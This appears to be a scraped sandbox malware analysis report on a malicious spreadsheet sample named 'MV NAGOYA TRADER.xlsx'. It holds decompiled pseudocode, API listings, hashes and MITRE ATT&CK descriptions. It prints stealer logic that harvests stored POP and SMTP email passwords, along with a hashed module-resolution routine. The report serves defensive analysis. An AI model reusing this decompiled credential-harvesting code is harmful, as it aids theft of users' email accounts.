Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Uniqueness

Uniqueness Score: -1.00%

Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}

0x00404a0d
0x00404a15
0x00404a18

APIs

RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Uniqueness

Uniqueness Score: -1.00%

Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}

0x00403b72
0x00403b7a
0x00403b7d

APIs

PathFileExistsW.SHLWAPI(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Uniqueness

Uniqueness Score: -1.00%

Function 004044EE, Relevance: 1.3, APIs: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044EE(void* __ecx, void* __eflags, WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16) {
				intOrPtr _v8;
				void* _t25;
				void* _t28;
				long _t29;
				signed int _t36;
				void* _t45;
				signed int _t53;
				signed int _t55;
				signed int _t58;
				void* _t61;
				void* _t63;

				_t36 = 0x400;
				_t53 = 2;
				_t58 = 0x400;
				_t61 = E00402B7C( ~(0 | __eflags > 0x00000000) | 0x00000400 * _t53);
				if(_t61 == 0) {
					L4:
					_t25 = 0;
				} else {
					_v8 = 0x800;
					while(1) {
						E00402B4E(_t61, 0, _t58 + _t58);
						_t28 = E004044A7(_a8, _a12, _a16, _t61, _t58, _a4);
						_t13 = _t58 - 1; // 0x3ff
						_t63 = _t63 + 0x24;
						_t66 = _t28 - _t13;
						if(_t28 != _t13) {
							break;
						}
						_v8 = _v8 + 0x800;
						_t36 = _t36 + 0x400;
						E00402BAB(_t61);
						_t55 = 2;
						_t58 = _t36;
						_t61 = E00402B7C( ~(0 | _t66 > 0x00000000) | _t36 * _t55);
						if(_t61 != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L5;
					}
					_t29 = GetLastError();
					_t45 = 2;
					__eflags = _t29 - _t45;
					if(_t29 != _t45) {
						_t25 = _t61;
					} else {
						E00402BAB(_t61);
						goto L4;
					}
				}
				L5:
				return _t25;
			}

0x004044f5
0x004044fe
0x00404501
0x00404512
0x00404517
0x0040457c
0x0040457c
0x00404519
0x00404519
0x00404520
0x00404527
0x0040453a
0x0040453f
0x00404542
0x00404545
0x00404547
0x00000000
0x00000000
0x00404549
0x00404550
0x00404557
0x00404562
0x00404565
0x00404574
0x0040457a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040457a
0x00404585
0x0040458d
0x0040458e
0x00404590
0x0040459b
0x00404592
0x00404593
0x00000000
0x00404598
0x00404590
0x0040457e
0x00404584

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Part of subcall function 004044A7: GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB

GetLastError.KERNEL32 ref: 00404585

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$Process$AllocateErrorFreeLastPrivateProfileString
String ID:
API String ID: 4065557613-0
Opcode ID: ebc845752c36f0904aead1c6cf9503316b3344090a2baf095c9b5e6dd64d927b
Instruction ID: 4921b4961515552709d35feb502e82dc384c9b3b90426e204c6f6ec5e0b55acd
Opcode Fuzzy Hash: ebc845752c36f0904aead1c6cf9503316b3344090a2baf095c9b5e6dd64d927b
Instruction Fuzzy Hash: 901157B26011043BEB249EA9AD46F7FB768DF84368F10413FFB05E61D0EA789C00069C

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}

0x00403fac
0x00403fba
0x00403fbe

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Uniqueness

Uniqueness Score: -1.00%

Function 00403C40, Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = CloseHandle(_a4); // executed
				return _t4;
			}

0x00403c4d
0x00403c55
0x00403c58

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Uniqueness

Uniqueness Score: -1.00%

Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}

0x0040647f
0x00406487
0x0040648a

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}

0x0040d070
0x0040d080
0x0040d084
0x0040d086
0x0040d08c
0x0040d0a0
0x0040d0ae
0x0040d0bd
0x0040d0c0
0x0040d0c5
0x0040d0c9
0x0040d0e3
0x0040d0f2
0x0040d101
0x0040d104
0x0040d109
0x0040d110
0x0040d11e
0x0040d123
0x0040d126
0x0040d12d
0x0040d145
0x0040d154
0x0040d15a
0x0040d166
0x0040d174
0x0040d186
0x0040d18e
0x0040d19a
0x0040d1ac
0x0040d1ba
0x0040d1cc
0x0040d1d1
0x0040d1dd
0x0040d1e2
0x0040d1e7
0x0040d1e7
0x0040d1e7
0x0040d1eb
0x0040d1f1
0x0040d1f7
0x0040d1ff
0x0040d207
0x0040d20f
0x0040d217
0x0040d21f
0x0040d227
0x0040d230

Strings

PopAccount, xrefs: 0040D0B6
Technology, xrefs: 0040D08D
SmtpAccount, xrefs: 0040D0FA
PopPassword, xrefs: 0040D0D0
SmtpPassword, xrefs: 0040D117
PopPort, xrefs: 0040D0A7
SmtpServer, xrefs: 0040D0DC
PopServer, xrefs: 0040D099
SmtpPort, xrefs: 0040D0EB
EmailAddress, xrefs: 0040D074

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Uniqueness

Uniqueness Score: -1.00%

Function 0040317B, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}

0x0040317f
0x00403180
0x00403180
0x00403180
0x0040318d
0x00403196
0x00403199
0x0040319b
0x004031a1
0x004031a9
0x004031ab
0x004031ac
0x004031ae
0x00000000
0x004031b0
0x004031b3
0x004031c2
0x004031c7
0x004031cd
0x004031e0
0x00000000
0x00000000
0x00000000
0x004031cd
0x004031d7
0x004031dd
0x004031cf
0x004031cf
0x004031d1
0x004031d5
0x00000000

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report MV NAGOYA TRADER.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "MV NAGOYA TRADER.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General

Stream Path: EncryptedPackage, File Type: data, Stream Size: 2628408

General

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
